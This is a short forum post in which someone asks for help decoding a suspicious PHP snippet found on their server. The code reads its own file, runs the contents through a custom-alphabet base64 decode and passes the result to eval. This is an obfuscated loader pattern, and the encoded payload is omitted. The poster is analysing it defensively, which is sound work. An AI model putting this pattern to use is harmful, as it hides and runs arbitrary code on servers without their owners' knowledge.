Hi!
I'm having too many problems on a Php-MySQL server, so I cannot afford any risk --need to see what's behind every chunk of code. I got to some point with the next one, but I'm pretty stuck, in fact mostly tired (and rather sick...)
<?php
$file=__FILE__;
$line=__LINE__;
$number=6212;
$pointer=fopen($file,'rb');
while(--$line)fgets($pointer,1024);
fgets($pointer,4096);
$output=(base64_decode(strtr(fread($pointer,372),'14YZOnMoHwjBEtgk7WfdIzurSpQxX3C+VaeTqJ6GlcFhsN/mv2ybiRP8KA0U95LD=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($output);
return;?>
[I].... long, long string....[/I]
Tried to load the long string in a txt file, swap eval to print, run the script, but the output is quite weird.
Any idea, please?